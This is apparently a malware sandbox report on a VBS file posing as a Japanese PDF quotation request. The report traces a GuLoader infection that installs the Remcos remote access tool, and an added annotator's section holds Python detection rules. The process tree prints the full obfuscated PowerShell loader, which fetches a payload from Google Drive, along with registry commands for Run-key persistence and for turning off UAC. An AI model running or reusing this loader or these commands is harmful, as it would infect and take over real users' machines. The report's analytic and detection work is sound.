Resubmissions (date, submission ID, score)

  • 25/03/2024, 07:31    240325-jcv47saf79    score 8
  • 25/03/2024, 03:43    240325-d9zk1aab3v    score 10
  • 25/03/2024, 03:42    240325-d9pqssfc37    score 1
  • 25/03/2024, 03:42    240325-d9fswsfc33    score 1
  • 25/03/2024, 03:19    240325-dt8hzahf8y    score 10
  • 25/03/2024, 03:01    240325-dh59gahd2z    score 10

    Scores range from 1 to 10 across resubmissions of the same file, so a single low-scoring run is not evidence that the file is benign; compare against the highest-scoring run.

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/03/2024, 03:01

General

  • Target

    見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs
    (Japanese: 見積依頼先 is roughly "quotation request recipient". The "·pdf" before the real .vbs extension uses a middle dot, not a period, so the name reads as a PDF lure while WScript.exe runs it as a script.)

  • Size

    181KB

  • MD5

    5abfcbce1f90501808379e179feb51c8

  • SHA1

    e305ee8202f579517fe0634e22346584aaf4c148

  • SHA256

    7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e

  • SHA512

    616becc5031d7b1d3e0b08b86a7a90b8a354a2357fe0fafe6e0e16c094eadfea2362452e32169b32f322b2c06e11c79b6220a40c8bd46be7dde21d086c7c2a5b

  • SSDEEP

    3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyC:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVJ

Malware Config

Signatures

  • Guloader,Cloudeye

    GuLoader (also tracked as CloudEyE) is a shellcode-based downloader first seen in 2020. In this run the downloaded payload is Remcos, dropped to C:\ProgramData\Remcos\remcos.exe (PID 3556; hashes under Downloads).

  • UAC bypass 3 TTPs 1 IoCs

    reg.exe (PID 2804 below) sets HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA to 0. That turns UAC off outright rather than bypassing it, takes effect only after a reboot, and writing under HKLM already requires an elevated token, so this is post-elevation tampering, not an elevation technique.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, most likely a geofencing check.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

    The $Mynas248 literal in the PowerShell stage below decodes (every eighth character, starting at offset 7) to a Google Drive direct-download URL of the form https://drive.google.com/uc?export=download&id=<file ID>. The file ID itself does not decode cleanly from this copy of the page because the extraction dropped non-ASCII padding characters, which shifts the alignment further along the string.

  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

    Both set ThreadHideFromDebugger on a thread, at creation or afterwards, so an attached debugger receives no events from it; fired by the SysWOW64 PowerShell (PID 3380) and by wab.exe (PID 4384).

  • Suspicious use of SetThreadContext 1 IoCs

    Fired by PID 3380 against its wab.exe child, the usual last step of writing a payload into a suspended process and redirecting its entry point; consistent with the same 50.7 MB region appearing in both processes' memory dumps (memory/3380-304 and memory/4384-310 below).
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
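Several of these signatures correspond to one-line command-line patterns that are visible in the process tree below: WScript.exe spawning powershell.exe, the 64-bit PowerShell re-launching the SysWOW64 PowerShell, wab.exe started from PowerShell, reg.exe writing EnableLUA=0, and a Run value whose data pulls its payload out of HKCU:\Hooves. The following is an added example written for this page, not part of the sandbox output: a small set of process-creation rules run over constructed events modelled on those command lines. The obfuscated PowerShell body is truncated, the parents of WScript.exe and rundll32.exe are assumed (the report does not show them), the final "reg query" event is a constructed benign control, and the rule and field names are this example's own.

```python
import re
from dataclasses import dataclass

# Added example: process-creation detection rules derived from the command lines
# in this report, run over constructed events. Not sandbox output.


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_image: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


# reg.exe ... Policies\System ... EnableLUA ... /d 0: UAC turned off outright.
# Writing this HKLM value already needs an elevated token.
RE_DISABLE_UAC = re.compile(r"policies\\system\b.*\benablelua\b.*/d\s+0\b", re.I)
# A Run value whose data is a PowerShell one-liner that reads its real payload
# from another registry location (here HKCU:\Hooves) instead of from disk.
RE_RUN_KEY_LOADER = re.compile(r"currentversion\\run\b.*(get-itemproperty|hkcu:\\)", re.I)


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches."""
    img, parent = _base(ev.image), _base(ev.parent_image)
    hits = []
    if parent in {"wscript.exe", "cscript.exe"} and img == "powershell.exe":
        hits.append("script_host_spawns_powershell")
    if parent == "powershell.exe" and img == "powershell.exe" and "\\syswow64\\" in ev.image.lower():
        hits.append("powershell_relaunch_as_wow64")   # 64-bit host re-launching the 32-bit one
    if parent == "powershell.exe" and img == "wab.exe":
        hits.append("powershell_spawns_wab")          # Windows Contacts used as the injection host
    if img == "reg.exe" and RE_DISABLE_UAC.search(ev.cmdline):
        hits.append("reg_disables_uac")
    if img == "reg.exe" and RE_RUN_KEY_LOADER.search(ev.cmdline):
        hits.append("run_key_pulls_payload_from_registry")
    if ev.image.lower().startswith("c:\\programdata\\remcos\\"):
        hits.append("remcos_programdata_path")        # install path seen in this report
    return hits


def evaluate(events) -> set[tuple[int, str]]:
    """(pid, rule) pairs for every rule hit across a list of events."""
    return {(ev.pid, rule) for ev in events for rule in classify(ev)}


PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"
WAB = r"C:\Program Files (x86)\windows mail\wab.exe"
CMD32 = r"C:\Windows\SysWOW64\cmd.exe"
REG32 = r"C:\Windows\SysWOW64\reg.exe"
RUN_KEY_CMD = r'''REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"'''

# Constructed events in the shape of Sysmon EID 1 / 4688 records, PIDs and
# command lines taken from the process tree; PowerShell bodies are truncated.
SAMPLE_EVENTS = [
    ProcEvent(4368, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"',
              r"C:\Windows\explorer.exe"),                      # parent assumed
    ProcEvent(3256, PS64, f'"{PS64}" "<#Ironiserende Imborder ... #>;$Pebermynters=(cmd /c set /A 115^^0);...;Reflectorizing $Modvinden;"',
              r"C:\Windows\System32\WScript.exe"),
    ProcEvent(3380, PS32, f'"{PS32}" "<# ... same body ... #>"', PS64),
    ProcEvent(4384, WAB, f'"{WAB}"', PS32),
    ProcEvent(4064, REG32, RUN_KEY_CMD, CMD32),
    ProcEvent(2804, REG32, r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f", CMD32),
    ProcEvent(3556, r"C:\ProgramData\Remcos\remcos.exe", r'"C:\ProgramData\Remcos\remcos.exe"', WAB),
    # Negative controls: the shell COM activation from the report and a benign reg query.
    ProcEvent(1492, r"C:\Windows\System32\rundll32.exe",
              r"C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding",
              r"C:\Windows\System32\svchost.exe"),              # parent assumed
    ProcEvent(9001, r"C:\Windows\System32\reg.exe", r"reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run",
              r"C:\Windows\System32\cmd.exe"),                  # constructed benign event
]

EXPECTED_HITS = {
    (3256, "script_host_spawns_powershell"),
    (3380, "powershell_relaunch_as_wow64"),
    (4384, "powershell_spawns_wab"),
    (4064, "run_key_pulls_payload_from_registry"),
    (2804, "reg_disables_uac"),
    (3556, "remcos_programdata_path"),
}

if __name__ == "__main__":
    for pid, rule in sorted(evaluate(SAMPLE_EVENTS)):
        print(f"PID {pid}: {rule}")
```

The EnableLUA rule on its own also catches administrators who disable UAC by hand, so treat it as high-confidence only when it fires together with the script-host and WOW64 re-launch hits; by the time it fires the host is already compromised at administrator level.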

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey 
I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili 
Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. 
Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3256
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3956
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey 
I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili 
Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. 
Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3380
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:1852
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1956
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4064
              • C:\Windows\SysWOW64\cmd.exe
                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4444
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  6⤵
                  • UAC bypass
                  • Modifies registry key
                  PID:2804
              • C:\ProgramData\Remcos\remcos.exe
                "C:\ProgramData\Remcos\remcos.exe"
                5⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:3556
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:1492
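The PowerShell stage above hides each real character among seven characters of Danish-word padding: `$Pebermynters` is the result of `cmd /c set /A 115^^0` (115 XOR 0, i.e. `s`), so `$Stikpiller` becomes `substring`; `albertuss` then reads `substring(i, 1)` for i = 7, 15, 23, ... up to length-1; and `Reflectorizing` dot-sources each decoded string into `iex`. The decoder below is an added example written for this page, not code from the sample or the sandbox; the three literals are copied verbatim from the command line above and the function names are this example's own. One caveat: this page's extraction dropped non-ASCII characters (compare `Frsteviolin`, `Lnkens`, `Anstdssten` in the header comment), so only the prefix of the URL literal decodes cleanly here; decode from the original .vbs rather than from this copy.

```python
import re

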